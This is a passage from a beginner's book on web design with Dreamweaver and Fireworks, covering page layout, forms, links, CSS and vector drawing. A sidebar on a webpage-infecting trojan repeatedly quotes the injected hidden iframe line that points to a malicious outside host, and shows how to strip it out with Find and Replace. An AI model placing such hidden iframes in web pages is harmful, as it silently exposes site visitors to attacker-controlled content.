Step11. The “Select Image Source” dialogue box will appear, locate, open the “images” folder, select 

the “ictng_logo.jpg” image file and the OK button. 
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Step12. You will be prompted to enter an “Alternate text” for picture; here I entered “ICTng logo” 
for the Alternate text and click the OK button. 
 

 
 
With the logo is still selected as show in the screenshot below, if not click on it to select it. 
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Press the forward key on your keyboard. 

The illustration at the right show what this look like in case 

you don't know. 

 

 

After you press the key the 

cursor should now be at the 

front of the logo, you may not 

easily notice this; see the 

screenshot at the right. 

 
 

 

Step13. Press the ENTER key, and the cursor should be in the next line or paragraph (below the logo) 

as we have in the screenshot below. 

 

Now we are ready to type some text here and format it to look like the one below. 
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It is very important to understand that typing in Dreamweaver can something be technically 

different from using your usually word processor like Microsoft Word. 

So let’s learn some of this little difference before we start using them. 

 

Paragraph and Line Break 
To understand this, you must have a good knowledge of HTML paragraph and line break. See the 

HTML chapter 

In Dreamweaver when you press the ENTER key on your keyboard it specify paragraph  <p> which 

looks like double line, this might not be ideal in all situation. See the screenshot at the left for better 

understanding. 

 
 

The arrow on the left screenshot is pointing at one of the spaces cause by pressing the ENTER key, 

just like we did in the last exercise with the logo; you would notice here that this space help to 

different each groups in our example PROGRAMMING, WEB and DATABASE, but what about other 

lines within a group such as VB.NET and Java or PROGRAMMING and .NET, which does not require 

double space. How do we do this in Dreamweaver?  This can be very frustrating to beginner in 

Dreamweaver. 

To achieve this No Space in Dreamweaver you hold the shift button while you press the enter key. 

(SHIFT + ENTER) this would generate break line <br />. See what I mean in the screenshot above 

right. 

Therefore:  ENTER = <p> while SHIFT+ENTER = <br /> 
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With this taken care of, we can now return to our lesson. With the cursor still positioned as the 

screenshot below. 

 

Start by typing IT Professional (press Enter) then 

Type PROGRAMMING (Shift + Enter) 

Type .NET (Shift + Enter) 

Type C, C++ (Shift + Enter) 

Type C# (Shift + Enter) 

Type VB.NET (Shift + Enter) 

Type: Java (Enter) this is to start the next group 

Type: WEB (Shift + Enter) 

Type: Design and Layout (Shift + Enter) 

 

Repeat these steps to till you complete the last 

group; this should look like the screenshot at the 

right. 
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Formatting text in Dreamweaver 
Now we are going to format this text using 

the description specified on the screenshot at 

the right, starting with bold. 

BOLD 

Step1. Select the line “IT Professional” this 

should appear like the screenshot below. 

 

 

 

Step2. Click the “B” (bold) at the properties bar, see the screenshot below. 

 

When you deselect (click anywhere within the page) the text should now look bold compare to the 

other text, like we have in the screenshot below. 

 

 

FONT SIZE 

Now we are going t increase the font size of the same text “IT Professional” to 24 

Step1. Select the text “IT Professional” again as you did before. 

Step2. Click the arrow in front of Size at the properties bar, and select 24, below is what it looks like. 
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After choosing 24 and deselected, the text should definitely appear bigger that the others, see the 

screenshot below. 

 

 

FONT COLOR 

Finally we need to add green color to the same “IT Professionals” text. 

Step1. Select the text again. 

Step2. Click the colour chooser right after the Size.  

 

Step3. Select green colour from the displayed colour palette.  
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Note you can as well enter the colour code #009900 into the textbox right after the colour chooser. 

 

Remember to save your page (Ctrl + S) after making any change. 

Now we are through with the formatting of out “IT Professional” which by now should look like what 

you have below. 

 

Now we can proceed to bold the heading of each group, starting from “PROGRAMMING”. 

Step1. Select “PROGRAMMING” just below “IT Professionals” 

Step2. Click bold “B” from the properties bar, see the screenshot below. 
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Repeat this for WEB and DATABASE as well. Now we are through with this section and it should look 

like this screenshot below. 

 

... NEXT 

Now let us proceed to the center cell or column, of the web page, below is what the completed 

project should look like. 
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Click the center cell or column, type “Latest Technology News”, increase the size to 24 and bold the 

text, just as we did earlier to “IT Professionals” and press the ENTER key, so the cursor should be in 

the paragraph, which is where the big image will be. Below is what our web page should look like 

now. 

 

Now we are going to add the big image, below the text.  

Just as we did with the logo earlier; the big image file is already in our images folder, you could 

remember it is one of the files “tech.jpg” we got from the ZIP folder we downloaded earlier.  

To insert it just as we did with the ICTng logo, click Insert > Image from the menu bar, located and 

click the file name “tech” or “tech.jpg” from the images folder and click OK  then enter its alternative 

text as “world of technology” and click OK. You page should now have the new look as the 

screenshot below. 
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Please remember to save your page CTRL+S 

Note: After inserting the big image if your screens look like what I have in the screenshot below, 

then you may need to collapse the panels so that you can have a better view of the page like what 

we have in the above screenshot. 

 

How to collapse the panels 

To collapse the panels click on the collapse arrow, right in front of the panel as shown in the 

screenshot below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

206 

 

 

As you could notice from the completed project, there are some text below this big image, to add 

the text, click on the big image you just inserted and press the forward key, then press ENTER on 

your keyboard, in case you have forgetting we did same after inserting the logo. 

With the cursor blinking below the image 

 

Below is the text that will appear below the image, please note that you don't have to press 

SHIFT+ENTER at each line and the only time you will have to press ENTER is where we have the new 

paragraph. The text is quite much even for me, you might decide not to type all the text or type 

whatever you like. 

Dreamweaver is a professional web editing tool for designing, coding, and developing 

websites and web applications, whether you enjoy hand-coding or prefer to work in a visual 

WYSIWYG (What You See Is What You Get) design environment, Dreamweaver provides you 

with helpful feature to enhance your web creation experience. 
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The visual editing features in Dreamweaver let you quickly create web pages without writing 

a line of code. You can view all your site elements and drag them from an easy-to-use panel 

directly into a page. You can design and optimize your image in graphics application such as 

Fireworks or create that Flash animation and import them directly into Dreamweaver. 

If you actually type all the text then your web page should look like the screenshot below. 
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Now our attention will now move to the right cell or column as indicated below.  

 

From the experience we are acquired in the previous exercises I don't thinks this area will pose much 

challenge to you, except for the FeedBack form. 

Note: while doing this you may need to adjust some cells 

Now click each of the three cells, type and format the text to match the description and look below.  
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I use the text in bracket, for example (Bolded) once more to give you the formatting tip, also notice 

the red arrow pointing at the cursor; please ensure that in your web page the cursor is at that 

position as we proceed to insert form using Dreamweaver. 

 

 

Danger: virus that infect WebPages  
In my career as a programmer and web designer I have battle with several virus attacks, understand 

how they work even write mine (for research purpose only. unfortunately while writing this book my 

computer was infected by a virus, which is more or less my old friend Trojan (HTML:IFrame-EW[Trj])   

Unfortunately I have to reinstall my Operating system, because the virus had actually damage some 

of my OS files and I lost some unimportant files. 

The good news is that this gives me the opportunity to share with you me experience about this 

dangerous and interesting virus that infect web page and how I deal with it. Although your antivirus 

software will detect this infected webpage as a threat, but does not have the ability to remove the 

virus other than to delete all this infected web page, which can have a very bad impact on your 

career, firstly by losing your clients web sites and secondly losing your rich past codes which could 

have been reuse for another project as we commonly do.  

 

My experience 

Before this event, my computer was secured with a trusted antivirus but one evening after restarting 

my computer after a long time of hibernation, my computer refuse to start, after a long hours of 

struggle I decided to format its hard disk after backing up my important file then I start with the 

formatting only to found out that my hard disk can’t be formatted, which lead to another hours and 

days of struggle before finding out that I have a bad sectors, then I use scan and fix disc to solve the 

problem before re-installing a new windows vista on it because the last one was windows XP, but 

this time I didn’t install an anti-virus then after about a month or more I started noticing this unusual 

line of code <iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe> somewhere 

below and sometimes above all web pages on my computer. 
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This is not the first time I will battle this type of virus, I know it to be a Trojan that scan through ones 

computer and infect all the web pages this Trojan actually reside inside your computer so even after 

you remove the line of code from your webpage and save it, immediate the Trojan infect it again, if 

you look at the URL in the infected line I suspect that the programmer of the virus is using it to sniff 

activities and important data from your web site possibly password, credit card info and other 

sensitive data from your web visitors. 

If you are visit a website infected with this virus on the internet and you computer does not have an 

effective anti-virus you may be a potential victim or even the website owner, other some browser 

like Mozilla Firefox (which is the only one I know of now) also have the ability to block or stop such 

web page from loading. 

As you can see the <iframe …. Style=”display none”> means that the virus does not display anything 

on web page when view so, even the web owner and visitors won’t know that something is fishing 

below the screen.  

 

Back to my experience, I later got a good antivirus program and scan my computer, that was when I 

knew that I’m also dealing with more than one Trojan but also several other ruthless viruses that has 

found their way and corrupt my Operating systems once again I reinstall a new windows, this time 

around Window 7, with this installation I don’t have to format my hard disk, with the new OS 

(Operating Systems) up, I install the virus again, then scan my backup, then the antivirus  found 

virtually all my web page as infected threat to my computer, but I didn’t panic as I said earlier this is 

not the first time I will face this type of challenge. 

Note that now that my OS is newly installed, that means the source, which is the Trojan that multiply 

and infect my webpage is out, now if I just remove the line that infect my web page and save it, that 

page simply remain like that and never infected again like before, since the source is out. 
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Now how do we remove this line from all the web pages on your website, as a web developer it is 

possible that you may have more than 1000 web pages on that computer. Below is how I did it using 

Dreamweaver.  

 

Find and Replace 
The first thing I did is to have my entire websites copied into one folder on my computer. Then 

define it as a New Website in Dreamweaver. After that I perform a search for the infectious line of 

code <iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe> and replace it with 

nothing, below are the steps in detail. 

Step1. In this example I have my entire website in this location C:\wamp\www so the folder “www” 

is where website resides. Then I define it in Dreamweaver Site>New Sites… hear is what the 

screenshot look like. 

 

After this I now have my entire website present in Dreamweaver as one website. The number of 

websites in the www folder is about thirteen (13) as you can see in the file panel below. You may not 

have that much anyway. 
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Note each of this website may contain several web pages, as you can see after I expanded the E-

Revision website (the screenshot above right) 

Now we can continue with the search and replace operation 

Step2. Click on the menu bar Edit > Find and Replace… or press Ctrl+F  

Step3. The Find and Replace dialogue box should appear, then set the following: 

Find in: Entire Current Local Site 

Search: Source Code 

Find: <iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe> 

The screenshot should look like what we have below. 
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This setting tell Dreamweaver to find the infectious line <iframe src="http://jL.chu&#114;a.pl/rc/" 

style="display:none"></iframe> in the source code of the entire website. Note however that I left 

the Replace box empty this is because I want the infectious line to be replaced by nothing, as I said 

earlier. 

Step4. Now click the “Replace All” button, immediately this is done Dreamweaver will warn you that 

you cannot reverse or undo the replace so click “Yes” then Dreamweaver will start with the 

operation, after the replace is completed it will report the how many change was done. 

I decided to introduce you to this important feature Find and Replace using my personal experience, 

so you can understand how to use it in your own situation when the need arise. 

 

New Dreamweaver CS3 

Before now we’ve been using an older version of Dreamweaver called Macromedia Dreamweaver 8, 

but after formatting of my hard disk, I had some challenges getting this version installed so I settled 

for newer version called Adobe Dreamweaver CS3. 

In case you don’t know Adobe Corporation popular software company, known for its outstanding 

array of great design software such as Photoshop and PageMaker now Indesign; so after Adobe 

acquired Macromedia the formal owner of Dreamweaver, that’s how the name changes come to be. 

Below is what the Macromedia Dreamweaver 8 logo look like:  

 

And now the new Adobe Dreamweaver CS 3 
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Although during the witting of this book, Adobe has already published her Creative Suite of CS5, 

which also includes Dreamweaver CS5. 

 

In as much as this newer versions come with some great and nice functions, I’m always of the 

opinion that there is no need for the rush to get your hand on all the latest software out there. I 

wrote this book with no intention to exhaust or focus on the new version of Dreamweaver or 

condemning the previous version. 

So all the examples in this book can be done using any version of Dreamweaver you have, so I don’t 

want you to bother yourself version now. 

 

Now we can continue with our ICTng project, before you forget we are about to add form to our 

webpage using Dreamweaver. 

 

With the cursor still in this position (please try to put it there, if it’s not there) because the next step 

will be to put the form at that position. 
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Working with form in Dreamweaver 
Step1. Click on the menu bar, Insert > (Point) Form then Click Form from the sub-menu, below 

screenshot may be of help… 

 

Immediate you click Form from the sub-menu; you should have the form in its location, just as show 

in the screenshot below. 
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Yes, the dotted red rectangle is the form, if you check the source this is what we should have as the 

form. 

<form id="form1" name="form1" method="post" action=""></form> 

 

This form has no visible element, but it is within this dotted red rectangle that we must put the 

visible form elements, such as textbox. Please see the HTML form page for a better understanding. 

But before adding any form element, it is 

mandatory to have a table inside the form to 

help us to structure its content, see the 

screenshot at the right to see what the complete 

project looks like. 

 

 

With your mouse pointer still inside the dotted 

red rectangle, that is inside form.  As shown in 

the screenshot at the right. Insert a table by 

following the steps below. 
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Click on the menu bar Insert>Table with 2 columns, 4 rows, 0 border and width as 100 percent, your 

Table dialogue box should look like the screenshot below. 

 

After clicking the OK button, the form will be inserted and should appear like what we have in the 

screenshot below. 

 

Now click the respective cells and enter the text Name, Email and Question, just as we have in the 

screenshot below. 
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Now click the cell in front of the Name, to have your cursor inside the cell as shown in the 

screenshot below. As you may know now, we are going to insert a Text Field here. 

   

Click on the Menu bar Insert > Form > Text Field, here is the screenshot below. 
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Please note that the Form sub-menu list, contains other Form element such as Textarea, button, 

Checkbox and others, just as we learnt in HTML Form chapter  

The reason why I strongly recommend you have a good knowledge of HTML is that some things can 

still be easily and better done from the source code, so I won’t bother to teach how to insert and set 

the properties of all this form element in Dreamweaver, your HTML knowledge will do. 

After clicking the Text Field, you will be prompt to enter some Attributes for the Text Field form 

element, just click the Cancel button (do the same as you add other elements later), our screen 

should now look like what we have in the below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

220 

 

 

Note: setting the form attributes for now is of no use, but as we will see later in PHP and 

MySQL that the form element attributes is actually very important when we need to access 

and process the values in these elements when submitted. 

Never mind the several table lines which makes it hardly to see the Text Field in the screenshot 

above, this is because we are in Design view, you won’t see any of such if you preview the web page 

in a browser (. (Please don’t forget to save these changes) 

 

 

Preview in web browser 

 

Still in Dreamweaver and the web page open. Click the Preview/Debug in browser icon  above 

the screen and click IExplore that is Internet Explorer, as shown in the screenshot below. 

 

With the preview in Internet Explorer, as you can see in the screenshots below the table and form 

lines have disappear, you can know see the Text Field better now. 
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Let’s continue with the form design, back to Dreamweaver, just as we did for the Name Field, insert 

Text Field in the cell in front of the Email and Textarea for Question. 

Our form design should now look like what we have below. 
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Note: I notice that the Textarea appear too wide, to reduce the width, click the textarea element 

(the arrow in the screenshot above is pointing to it), immediately this is done, the properties bar 

should now change to so that you can alter the properties of the textarea. 

In case you don’t know selecting any element on the page makes the properties bar to change so 

that you can alter this element’s properties. That is why it is called Properties bar. 

After selecting the textarea, the Properties bar should now appear like the screenshot below. 

 

So to reduce the size of the Textarea we simply change the Char width figure from the default “45” 

to “25” now you can see the Textarea with reduce to what can be seen in the screenshot below. 

 

 With this done, (please don’t forget to save your page) the last step to complete our form is to add a 

Submit button, just as we did with the other form element, click the last cell below the Textarea, see 

the screenshot below. 
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Now click on the Menu bar Insert > Form > Button 

 

Now the submit button should be in the expected location, as shown in the screenshot be. 

 

Now we are though with our form, please save (Ctrl+S) your web page, we can now move on to 

create the navigation or hyperlink 

 

Linking your pages 
The navigation or hyperlink we want to create will be located above the web page; see the 

screenshot below is what it will look like.  
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With our “index.html” web page still open, click the location were the navigation link would be; that 

is the empty cell at the top. See the screenshot below. 

 

With the cursor still at that location, Click the arrow close to “Horz” from the Properties bar below 

the Dreamweaver screen and choose “Center” to align the cell to center. See the screenshot below.   

 

After clicking “Center” you would now see the cursor at the center of the cell, as we have below. 
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Now type the text below in the location of the cursor. 

Home Latest Technology News IT Professionals and Developer ICT Discussion 

 

 

Multiple spacing problem in Dreamweaver 

As you can notice each text link need more space in between each other, instead of the clumsy way 

we have it now. There is no problem doing this in your word processor such as MS Word, below is 

what I mean. 

Home         Latest Technology News         IT Professionals and Developer         ICT Discussion 

I just hit the space bar on my keyboard, multiple times in MS Word to make the text above appear. 

But this cannot be done in Dreamweaver design view, because hitting the space bar multiple times 

won’t make any change, as it won’t exceed the current space we have in-between the text now. 

To add this spacing, switch to the source code View > Code this will make our screen to be look like 

what we have below. 
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In case you don’t know HTML representation for space is &nbsp;  

So we are going to add three spaces in between Home and Latest Technology News, still in code 

view, this is what I did. 

Home &nbsp;  &nbsp;  &nbsp; Latest Technology News  

The screenshot of my code view is below. 

 

And now the design view. 

 

I believe you can see the space difference in Design view, now do the same to the two other texts.  
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To make things easier I prefer copying and pasting, instead of typing &nbsp; multiple times, the 

result should look like what we have below. 

 

To make it easily visible, I put each text in difference line in my code view. 

Note: this does mean each line of text it would appear in different line in the design view or 

when previewed. For text to appear in difference line it must be preceded by <br /> or <p/> 

see the HTML chapter to for more. 

 

 Below is the effect of these changes to the link text. 

 

Now that the link texts are well spaced we can now link them. 

 

LINKING IN DREAMWEAVER 

Step1. Select the first text to be link, starting with “Home”. Below is how it will look when selected. 

 

Step2. In the Link textbox at the Properties bar, type “index.html” which is the name of the web 

page you want to link the text to. See the screenshot below. 
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By the time you deselect from the Link textbox, the link should now take effect on “Home”, just as 

we have below. 

 

Note: Because it is possible to type in the wrong web page name in the link text, Dreamweaver offer 

more options for linking other that typing the name of the webpage or URL in the link text. Below is 

other linking option. 

Other linking options 

1. Link dropdown: this option allows you to select the file you want to link to from the dropdown 

button of the link tool. See screenshot below. 
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As you can see when you click the dropdown button, it displays all recently linked address for you to 

choose from. 

 

2. Link browse for file: This option let us to browse to the file we want to link to by clicking the 

browse icon in front of the Link tool. See the screenshot below. 

 

After clicking the “browse to file” icon, a select file box while appear like what we have below, then 

you will click the file you want link to and click the OK button. 
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Note: I use the red arrow to point to the Look in: box to let you see that the active website “ictng” is 

the one we are seeing its content. 

It is however important to note that sometime you may not be seeing your website as the active 

website, if this happens you should consider clicking the Look in:  dropdown to select your website. 

See what I mean in the screenshot below. 
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3. Point to file: I love using this option to impress people, it allows you to link to a file, by clicking 

and dragging the “point to file” handle to the file you want to link to in the  file panel. See the 

screenshot below. 
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Note: to be sure the linking was successful; the name of the webpage must appear in the Link text 

just like the first linking example, see the screenshot below (this is also applicable to all other linking 

options). 

 

 

Note: this option may take some time to perfect; you may have to continue using the other options 

while you perfect this. 
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You can now link the other text  

 

Since we only have one page “index.html” in our website, we still need to create three more pages.  

news.html (for Latest Technology News) 

professional.html (IT Professionals and Developer) 

discuss.html (ICT Discussion) 

Now that we have agreed on the name we are going to call each of this three pages, we can go 

ahead to link each respective text, then we will create pages later. 

Therefore select the next text Latest Technology News on the webpage, and type in “news.html” in 

the Link text, as we did with the first text “Home” 

 

As you can see, this is one of the advantages of linking using this method; you can link even before 

creating the page, while the disadvantage could come from typing wrong name for webpage when 

creating it. 

Please repeat this to link the two other texts, professional.html (IT Professionals and Developer) and 

discuss.html (ICT Discussion). When this is done, our “index.html” webpage should now appear like 

what we have in the screenshot below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

234 

 

 

Before we conclude with this page I will like us to compare look of our “index.html” webpage with 

the one we are coping from (the prototype). 

 

 

The Prototype 

 

A closer look at the prototype compare to our own “index” shows that our formatting is still 

incomplete. 
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The Prototype 

- The font style is Arial 

- The Link colour is Green 

 

Our “index.html” 

- The font style is the default “Times New 

Roman” 

- The link colour is the default “blue” colour 

 

The formatting of the Prototype web page was done using an external CSS file, please read more 

about CSS in chapter 

If you could remember, when we downloaded the zip file were we got the images we use in our 

index page, we also got a CSS file name “style.css”, this CSS file contains all the style that will bring 

our webpage to look exactly like the prototype, so the next lesson we will learn is how to attach or 

include the “style.css” CSS file to our “index.html” webpage in Dreamweaver. 

 

Using CSS for formatting 
With our “index.html” page still open in Dreamweaver. 

Step1. Click the CSS panel to expand it, if it is not expanded already; this is just above the file panel; 

see the screenshot below for direction. 
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Step2. Click the “Attach Style Sheet” icon , from the 

expanded CSS panel. See where the arrow is pointing in 

the screenshot at the right. 

 

 

Immediately you click the icon, the “Attach External Style Sheet” dialogue box will appear, as shown 

in the screenshot below. 
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Step3. Click the “Browse…” button, as indicated with the arrow above. 

This will prompt you to browse to the “style.css” file.  

So I browse and open the “images” folder from this dialogue box, to access the “style.css” file. 

 

Then I click the style file and click the “OK” button. Immediately this is done the File/URL of the 

earlier “Attach External Style Sheet” dialogue box should now contain the path and name of the 

style file (images/style.css). This should look like what we have in the screenshot below. 

 

Finally click the OK button. 
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The look of our “index.html” webpage should now look exactly like the prototype, as you can see in 

the screenshot below the style sheet has change the entire format of the page. 

 

A closer look shows that the font style is now Arial and the link colour green.  

 

Note: when this is done; in the code view the style sheet we attach will appear like the code below, 

so you could as well just write the line of code from the code view if you are having problem using 

the design view. 
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This shouldn’t be strange to you if you had gone through the CSS chapter earlier. 

 

Now that we are through with our index.html or homepage, we can now continue with the creation 

of the other WebPages; that is the news.html, professional.html and discuss.html, don’t forget we 

had already specify this link in our Homepage so we can now start creating them. 

 

Creating more pages 
Like every other experience web developer, I can assure you that It’s of no use creating  every 

webpage from the scratch, because it is unproductive and some pages will lack consistence in 

design. Just imagine having to create the layout, add logo, link and format every page in your 

website not to talk of putting its content, I’m sure this could be like a punishment and time 

consuming to even the most experience designer out there. 

So what I actually do and will be using in this book is what I call the DRE method; that is “Duplicate-

Rename-Edit” to create other web pages from an existing and well formatted page like our 

“index.html”.  

First ensure that Dreamweaver is open and our “ictng” is the active web in the file panel, if you’ve 

not close Dreamweaver after the last exercise then the “ictng” should be the active website, the 

screenshot below shows the “ictng” as the active website in the file panel. 

 

With the website active we can now duplicate of the “index.html” page and renaming the new copy 

after the new page before finally editing or changing its content. 

 

Duplicating the page 

Shortcut for this is to click (not right-click) the file “index.html” in the file panel and press Ctrl + D  
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Or 

Step1. Right-click of the “index.html” from the file panel,  

Step2. Point Edit from the menu display, a sub-menu would appear. 

Step3.  Click Duplicate in the sub-menu. Below screenshot will direct you better. 

 

Immediately either of this is done, you will now see the copied file in the file panel as “Copy of 

index.html” see the screenshot below. 

 

Now we can now rename the “Copy of index.html” file to “news.html” before editing or modifying 

its content. 

 

Renaming the page 
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Step1. Right-click the newly copied file “Copy of index.html” 

Step2. Point Edit from the menu display, a sub-menu would appear, just like in the Duplicate 

exercise earlier. 

Step3.  Click Rename in the sub-menu. 

Or use the shortcut: Click the file (not right-click) and press F2 on your keyboard. 

 

After either of this is done, the file will be in rename mode, see the screenshot below. 

 

While the file is in rename mode, type the new name, which is “news.html”. Please note it must 

contain the “.html” extension. Just as we have in the screenshot below,  

 

With the name now renamed we can now open the “news.html” files, which its content shouldn’t be 

different from the index.html which it was copied from. Below is the “news.html” would look like. 
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As you can see the “news.html” file opened above contained the same content as the “index.html” 

as you know the next step should be  to edit or modify its content, but before then let’s have a 

closer look at the page tab so that you can differentiate between the active page and the inactive 

one. 

 

Page Tab 

 

The screenshot above indicate that two pages are open “index.html” and “news.html” while the 

“news.html” is the activate one; meaning it is the one you are currently seeing. 

The page tab allow you to open as many page as possible, but only one page can be active at a time,  
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You can however click any of the inactive pages in the page tab to make it active. 

 

…. Continue with the news.html 

With the “news.html” page still active I edited mine with some text content to look like what you 

have in the screenshot below. But you can edit yours with any content you want, just make sure its 

content is change so that it can be different from the Homepage (index.html). 

 

 

The news.html page 

 

Now repeat the step you use in creating the “news.html” page, to create the two remaining pages, 

which are “professional.html” and “discuss.html”.  

The screenshot below shows the contents of my pages 
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The “professional.html” page 

 

The “discuss.html” page 

You can now preview your website in a browser. the first thing I will advise you do is to click on every 

link to test if they are all linking to the right page, I you notice any error such as “Page not found” or 

“The webpage cannot be found” depending on the browser you are using.  

Then you must have mistyped or entered a wrong name for the page you are trying to link to. If you 

have such problem with your link, then follow the step below to fix it. 

 

Fixing broken link 

First note the name of the page that could not be found, and then return to the page that you are 

linking from. 

For example, you are in the Homepage (index.html) and you click the ICT Discussion (discuss.html) 

page, from the Homepage and you got the page not found error, so It is logical that you must have 

type a wrong file name let’s say “discus.html” instead of “discuss.html” this error can easily happen 

since you type the link by hand before you create the page.  
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If this happens, then you must edit the links in Dreamweaver, using any of the other link options 

discussed earlier, preferable Link browse for file, since all pages the pages are now created. 

Note: if such an error explained above happen, then you must fix it for every webpage of the 

website, since all the pages are copied from one source “index.html” although Dreamweaver also 

have a tool for checking link report, but I will advise you not to be too dependent on Dreamweaver 

to fix everything for you as a professional web developer (I believe you are now), you may find 

yourself in an environment where you don’t have Dreamweaver installed like I’ve been in many 

occasion, so I will advise you master HTML and learn to be very logical when fixing problems. 

To draw the curtain close, I will huge you to see the knowledge and examples we’ve done in this 

chapter as a stepping stone; that is consider it as starting point. Because I believe you can explore 

and create better, attractive and powerful website. 

 

 

 

  



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

246 

 

CHAPTER 4 

WEB GRAPHICS DESIGN USING FIREWORKS 
 

 

Though some  web designer prefer using Adobe Photoshop for creating web graphics, Photoshop is a 

great and probably one of the most popular graphic tools out there, but personally I think Photoshop 

is too complex because it can be used for many things. Today photographer use it for picture 

retouching, those in the print media using it for poster design, the multimedia guys use it for 

creating their designs too and the list goes on.  

Although I prefer Photoshop for picture editing or retouching but not for web graphics because I give 

it to Fireworks, probably because Fireworks was built from inception for web graphics; I find 

Firework is easier, lighter and straightforward compare to Photoshop when it comes to web graphics 

design. 

Firework is the definitive solution for professional web graphics design and production. It is the first 

production environment to address and solve the special challenges facing web graphics designers 

and developers. 

You can use Fireworks to create, edit, and animate web graphics, add advanced interactivity, and 

optimize images in a professional environment. In Fireworks, you can create and edit bitmap and 

vector graphics in a single application. 

Without wasting more time let’s start fireworks and start learning, in this Fireworks chapter we are 

going to learn how to using some tools then after that we will take some exercise to apply what 

we’ve learnt. 

 

STARTING FIREWORK 

Because I am using Adobe Fireworks CS3, 

I click Start > Program > Adobe Master Collection CS3 > Adobe Fireworks CS3 

If you are using the older version of Fireworks (Macromedia Fireworks 8) 

Click Start > Programs > Macromedia > Fireworks 8 

 

Note: I will repeat here again that this book is not written to discuss a version of software. 

That is any version of Fireworks will be just OK to practice the exercises in this chapter. 
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After starting Firework, we should now have a welcome screen like what we have below. 

 

 

Creating new files in Fireworks 
Now let’s create new fireworks file, click from the menu bar File > New see the screenshot below. 

 

Immediately you click “New” from the drop-down, a “New Document” dialogue box will appear; in 

this exercise I entered 500 for the width and 500 for height of the Canvas before clicking the “OK” 

button. See the screenshot below. 
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After clicking the OK button, the Fireworks will now present you a canvas area and also make the 

Toolbox active, I suppose this are the two major unusual things we don’t see in Dreamweaver, in 

addition to this the Panels and Properties is differs. 

 

 

Understanding Fireworks windows 
Now let’s look at some of the things we have in the screenshot above.  

Document or file name 
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First when we create a new document, the default name of the goes like “Untitled-1.png” or 

“Untitled-2.png” or the number may go on, but as soon as the file is save the new name replace the 

default name. And note that the file extension for Fireworks is .png  

 

 

Toolbox 

The Toolbox is segmented 

into six categories which are 

 Select 

 Bitmap 

 Vector 

 Web 

 Colors  

 View.  

See the right screen, for the 

description of what we have 

in the toolbox.  

 

 

 

 

GROUPED TOOLS 

It is however important to note that some tools a grouped together, the small triangle in the lower 

right corner of tools such as the Rectangle tool, Lasso tool, Blur tool, Pen tool among others, indicate 
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that they are other tools grouped with them. The example below shows how I am able to access the 

Polygon tool (Auto shape). 

 

In the screenshot above, (1) I click on the Rectangle tool and hold down the mouse button then (2) 

the fly-out menu display the other tools from the group then I click the “Smart Polygon” tool to draw 

a polygon, by this time (3) the polygon would now be current tool in the group.     

 

THE CANVAS 

The word canvas is not strange to we fine artist, because it is the platform on which we pour out our 

imagination, creativity and express our self when painting using, thus you here words like oil on 

canvas.  

In paining class we spend time to prepare the canvas for painting, therefore nothing can be painted 

outside the canvas. Same is applicable in Fireworks all your design must be within the canvas. 

Before we start creating some cool stuff in Fireworks I will like you to understand the difference 

between Bitmap and Vector graphics. 

 

About bitmap and vector graphics 

Computers display graphics in either vector or bitmap format. Understanding the difference 

between the two formats helps you understand Fireworks, which contains both vector and bitmap 

tools and is capable of opening or importing both formats. 
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Bitmap graphics are composed of dots, called pixels, arranged in a grid. When you edit a 

bitmap graphic, you modify pixels rather than lines and curves. Bitmap graphics are 

resolution-dependent, which means that the data describing the image is fixed to a grid of a 

particular size. Enlarging a bitmap graphic redistributes the pixels in the grid, often making 

the edges of the image appear ragged. 

Vector graphics render images using lines and curves, called vectors, which include color 

and position information. When you edit a vector graphic, you modify the properties of the 

lines and curves that describe its shape. Vector graphics are resolution-independent, which 

means you can move, resize, reshape, or change the color of a vector graphic, as well as 

display it on output devices of varying resolutions, without changing the quality of its 

appearance. 

Source: Adobe Fireworks Help 

Now we can start drawing, using the vector tools.  

 

Working with Vector Shapes 
We are going to draw a simple rectangle in this exercise. But before we do, I will like us to start by 

setting a default colour for the object we are about to draw, because if you are using Fireworks for 

the first time if the Stroke and Fill color tools will have no color and we draw any shape the shape 

will look invisible. 

 

So it is advisable we ensure that either of this tool is set to a visible color before any drawing is 

made, then after drawing the object you can then decide to change the colour to any colour you 

wish to later. 

SETTING THE FILL COLOR  

Step1. Click on the Fill color tool  to display the 

colour palette. 

Step2. Click a colour from the color palette, for example I 

click red colour (#FF0000), as shown in the screenshot at 

the right.  

Now the Fill tool should now have a red colour , 

then we can proceed to create red rectangle, or any other 

vector shapes. 
 

Drawing a Rectangle and other vector shapes  
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Step1. Click on the rectangle tool, as indicate in the screenshot below. 

 

Please note that this is one of the grouped tools, so if the rectangle tool is not currently active you 

can display and choose is it from the fly-out. (We discuss this earlier, see Grouped tools). 

Step2. Move your cursor to the canvas, the cursor should have the cross sign as the screenshot 

below. (The cross sign indicate that we are ready to draw) 

 

Step3. Now click and hold down the mouse button, and drag towards the down-left, the screenshot 

below shows how my screen look like while doing this. 
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In the screenshot above I use the red arrow with “Drag Down-Left” description to let you know the 

direction to drag your mouse to.  

Step4. Now release the mouse button if you have not already done so. Below is what I have on my 

screen, after releasing my mouse. 
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With the rectangle drawn, I will like to move it to the upper-left of the canvas, reduce its size so that 

we can draw some other objects. 

So I will have to use the Pointer tools, from the toolbar to do this 

Select the object 

Step1.  Click the Pointer tools from the toolbar. 

 

Step2. With the Pointer clicked, select the rectangle on the canvas by clicking on it. 

 

The small black arrow indicates the pointer tool while the tiny blue dots at the edges of the 

rectangle indicate that the object has been selected. With the rectangle still selected, I will like to 

point your attention to the size of this rectangle at the properties bar, because in the next exercise 
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we will be learning how to reduce its size. Please note that your rectangle may not necessarily have 

the same size. 

 

With the rectangle still selected we can now proceed to changing the size of the object or whatever 

we chose to do with the object now.   

By the way: similar you can DESELECT or remove the selection from an object by click 

outside the canvas (the grey area) as shown in the screenshot below. 

 

 

Adjusting the size of the object 

There are two ways you can adjust the size of an object in Fireworks.  

(1) Using Pointer tool   

(2) Entering the size number from the Properties bar  

Adjusting object with the pointer tool is faster and easier for some people but when accuracy of size 

is required it can be better done from the Properties bar.  
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So let’s start with: 

Using the Pointer tool 

Step1. With the Pointer tool still active and the rectangle 

selected, as we have in the last exercise. Move you 

Pointer tool to any of the tiny blue dots that indicate that 

the object is selected. See the screenshot at the right. 

